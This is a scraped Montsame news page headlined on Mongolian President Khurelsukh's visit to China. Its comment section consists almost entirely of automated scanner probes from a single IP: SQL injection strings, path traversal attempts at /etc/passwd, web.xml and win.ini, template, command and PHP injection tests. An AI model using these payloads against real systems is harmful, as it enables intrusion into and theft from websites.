Монгол Улсын Ерөнхийлөгч У.Хүрэлсүх БНХАУ-д хийсэн айлчлалын үр дүн

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-05 11:07:15
Related news
Comments
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',14)='f 194.163.191.42 440 days

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l 194.163.191.42 440 days

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:14 194.163.191.42 440 days

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 440 days

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(14))::text>'0 194.163.191.42 440 days

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 440 days

  123456
 • admin"and(select*from(select+sleep(14))a/**/union/**/select+1)=" 194.163.191.42 440 days

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 440 days

  123456
 • admin'and(select*from(select+sleep(14))a/**/union/**/select+1)=' 194.163.191.42 440 days

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 440 days

  123456
 • admin"and"m"="d 194.163.191.42 440 days

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 440 days

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 440 days

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 440 days

  123456
 • admin"and"c"="c 194.163.191.42 440 days

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 440 days

  123456
 • admin'and't'='f 194.163.191.42 440 days

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 440 days

  123456
 • admin'and'h'='h 194.163.191.42 440 days

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',14)='n
 • ../WEB-INF/web.xml;admin 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
 • ../WEB-INF/web.xml 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('m',14)
 • WEB-INF/web.xml;admin 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('w',0)
 • admin 194.163.191.42 440 days

  123456'and(select+1)>0waitfor/**/delay'0:0:14
 • WEB-INF/web.xml 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456/**/and(select+1)>0waitfor/**/delay'0:0:14'/**/
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 440 days

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 440 days

  123456'/**/and(select'1'from/**/pg_sleep(14))::text>'0
 • ./../../../../../../Windows/win.ini 194.163.191.42 440 days

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 440 days

  123456/**/and(select+1/**/from/**/pg_sleep(14))>0/**/
 • admin 194.163.191.42 440 days

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 440 days

  123456"and(select*from(select+sleep(14))a/**/union/**/select+1)="
 • admin 194.163.191.42 440 days

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456'and(select*from(select+sleep(14))a/**/union/**/select+1)='
 • admin 194.163.191.42 440 days

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 440 days

  (select*from(select+sleep(14)union/**/select+1)a)
 • admin 194.163.191.42 440 days

  (select*from(select+sleep(0)union/**/select+1)a)
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456"and"v"="u
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456"and"b"="b
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456'and's'='x
 • admin 194.163.191.42 440 days

  123456'and'm'='m
 • admin 194.163.191.42 440 days

  123456/**/and+0=7
 • admin 194.163.191.42 440 days

  123456/**/and+2=2
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 440 days

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 440 days

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 440 days

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 440 days

  123456
 • admin'"\( 194.163.191.42 440 days

  123456
 • admin鎈'"\( 194.163.191.42 440 days

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 440 days

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1636604563')))>'0 194.163.191.42 440 days

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 440 days

  123456
 • <%- 922580183+852572307 %> 194.163.191.42 440 days

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 440 days

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1577230847'))) 194.163.191.42 440 days

  123456
 • admin/**/and/**/cast(md5('1794187233')as/**/int)>0 194.163.191.42 440 days

  123456
 • %u2215etc%u2215passwd 194.163.191.42 440 days

  123456
 • #set($c=862559436+808159221)${c}$c 194.163.191.42 440 days

  123456
 • ${(847037793+802614059)?c} 194.163.191.42 440 days

  123456
 • admin'and(select'1'from/**/cast(md5(1025012520)as/**/int))>'0 194.163.191.42 440 days

  123456
 • %2fetc%2fpasswd 194.163.191.42 440 days

  123456
 • ${984016687+860294986} 194.163.191.42 440 days

  123456
 • extractvalue(1,concat(char(126),md5(1933493824))) 194.163.191.42 440 days

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1289959370)))and" 194.163.191.42 440 days

  123456
 • /etc/passwdadmin 194.163.191.42 440 days

  123456
 • /*1*/{{907111590+863206845}} 194.163.191.42 440 days

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1438105193)))and' 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  <%- 849974785+952824819 %>
 • /etc/passwd 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456'"\(
 • admin 194.163.191.42 440 days

  #set($c=977546979+915643526)${c}$c
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  ${(988691238+967850012)?c}
 • admin 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  ${920703680+935741023}
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  /*1*/{{825028930+960827128}}
 • admin 194.163.191.42 440 days

  123456鎈'"\(
 • ./../../../../../../etc/passwd 194.163.191.42 440 days

  123456
 • admin$(expr 906189273 + 839517669) 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1691350082')))>'0
 • admin 194.163.191.42 440 days

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 440 days

  123456
 • ../../../../../../etc/passwd 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1499163667')))
 • admin 194.163.191.42 440 days

  123456/**/and/**/cast(md5('1862942375')as/**/int)>0
 • admin 194.163.191.42 440 days

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456'and(select'1'from/**/cast(md5(1342178353)as/**/int))>'0
 • admin 194.163.191.42 440 days

  ${881984648+971289018}
 • '-var_dump(md5(974372728))-' 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456
 • admin|expr 811171299 + 854301559 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  extractvalue(1,concat(char(126),md5(1361115637)))
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456"and/**/extractvalue(1,concat(char(126),md5(1474032223)))and"
 • admin 194.163.191.42 440 days

  123456'and/**/extractvalue(1,concat(char(126),md5(1519553490)))and'
 • ${@var_dump(md5(335367593))}; 194.163.191.42 440 days

  123456
 • ${918954539+831127696} 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456
 • ymwohqvytzpvnpwgedte 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  '-var_dump(md5(789984064))-'
 • admin 194.163.191.42 440 days

  ymwohqvytzpvnpwgedte
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  ${@var_dump(md5(888750922))};
 • admin expr 879840506 + 843070788 194.163.191.42 440 days

  123456
 • admin 194.163.191.42 440 days

  123456